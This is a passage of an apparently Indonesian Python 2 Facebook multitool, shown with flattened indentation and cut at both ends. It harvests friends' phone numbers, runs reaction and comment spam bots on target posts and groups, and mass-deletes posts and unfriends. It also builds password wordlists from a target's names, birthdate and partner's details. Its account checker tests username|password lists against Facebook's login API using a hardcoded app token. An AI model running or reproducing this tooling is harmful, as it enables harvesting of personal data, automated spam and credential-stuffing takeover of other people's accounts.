raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def nomor_hp():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url = 'https://graph.facebook.com/me/friends?access_token=' + toket
r = requests.get(url)
z = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Phone\x1b[1;96m%s' % len(hp)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] An error occurred '
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def hpfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput Friends ID \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hpfromfriends.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal number\x1b[1;96m%s' % len(hpfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def menu_bot():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Bot Reactions Target Post'
print '║-> \x1b[1;37;40m2. Bot Reactions Group Post'
print '║-> \x1b[1;37;40m3. Bot Comment Target Post'
print '║-> \x1b[1;37;40m4. Bot Comment Group Post'
print '║-> \x1b[1;37;40m5. Mass Delete Post'
print '║-> \x1b[1;37;40m6. Accept Friend Requests'
print '║-> \x1b[1;37;40m7. Unfriends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
bot_pilih()
def bot_pilih():
bots = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if bots == '':
print '\x1b[1;91m[!] Can\'t empty'
bot_pilih()
else:
if bots == '1':
menu_react()
else:
if bots == '2':
grup_react()
else:
if bots == '3':
bot_komen()
else:
if bots == '4':
grup_komen()
else:
if bots == '5':
deletepost()
else:
if bots == '6':
accept()
else:
if bots == '7':
unfriend()
else:
if bots == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mnot found'
bot_pilih()
def menu_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
react_pilih()
def react_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
react_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
react()
else:
if aksi == '2':
tipe = 'LOVE'
react()
else:
if aksi == '3':
tipe = 'WOW'
react()
else:
if aksi == '4':
tipe = 'HAHA'
react()
else:
if aksi == '5':
tipe = 'SAD'
react()
else:
if aksi == '6':
tipe = 'ANGRY'
react()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
react_pilih()
def react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksi))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
reactg_pilih()
def reactg_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
reactg_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
reactg()
else:
if aksi == '2':
tipe = 'LOVE'
reactg()
else:
if aksi == '3':
tipe = 'WOW'
reactg()
else:
if aksi == '4':
tipe = 'HAHA'
reactg()
else:
if aksi == '5':
tipe = 'SAD'
reactg()
else:
if aksi == '6':
tipe = 'ANGRY'
reactg()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
reactg_pilih()
def reactg():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m'<>' \x1b[1;92m for newline"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
nam = requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mStarting remove status\x1b[1;97m ...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mFailed'
except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mRemoved'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket)
friends = json.loads(r.text)
if '[]' in str(friends['data']):
print '\x1b[1;91m[!] No friends request'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in friends['data']:
gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket)
a = json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Failed'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mRemove\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Write Status'
print '║-> \x1b[1;37;40m2. Make Wordlist'
print '║-> \x1b[1;37;40m3. Account Checker'
print '║-> \x1b[1;37;40m4. List Group'
print '║-> \x1b[1;37;40m5. Profile Guard'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
pilih_lain()
def pilih_lain():
other = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if other == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_lain()
else:
if other == '1':
status()
else:
if other == '2':
wordlist()
else:
if other == '3':
check_akun()
else:
if other == '4':
grupsaya()
else:
if other == '5':
guard()
else:
if other == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mnot found'
pilih_lain()
def status():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
msg = raw_input('\x1b[1;91m[+] \x1b[1;92mWrite status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
print '\x1b[1;91m[!] Can\'t empty'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op = json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah'
print 52 * '\x1b[1;97m\xe2\x95\x90'
a = raw_input('\x1b[1;91m[+] \x1b[1;92mName Depan \x1b[1;97m: ')
file = open(a + '.txt', 'w')
b = raw_input('\x1b[1;91m[+] \x1b[1;92mName Tengah \x1b[1;97m: ')
c = raw_input('\x1b[1;91m[+] \x1b[1;92mName Belakang \x1b[1;97m: ')
d = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan \x1b[1;97m: ')
e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f = e[0:2]
g = e[2:4]
h = e[4:]
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v'
i = raw_input('\x1b[1;91m[+] \x1b[1;92mName Pacar \x1b[1;97m: ')
j = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan Pacar \x1b[1;97m: ')
k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
l = k[0:2]
m = k[2:4]
n = k[4:]
file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg = 0
while wg < 100:
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while en < 100:
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while word < 100:
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while gen < 100:
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except IOError as e:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password'
print 52 * '\x1b[1;97m\xe2\x95\x90'
live = []
cek = []
die = []
try:
file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list = open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mSeparator \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password = meki.strip().split(str(pemisah))
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
print '\x1b[1;97m[\x1b[1;91mDie\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p['name']
id = p['id']
f = open('grupid.txt', 'w')
listgrup.append(id)
f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 52 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Group \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except requests.exceptions.ConnectionError:
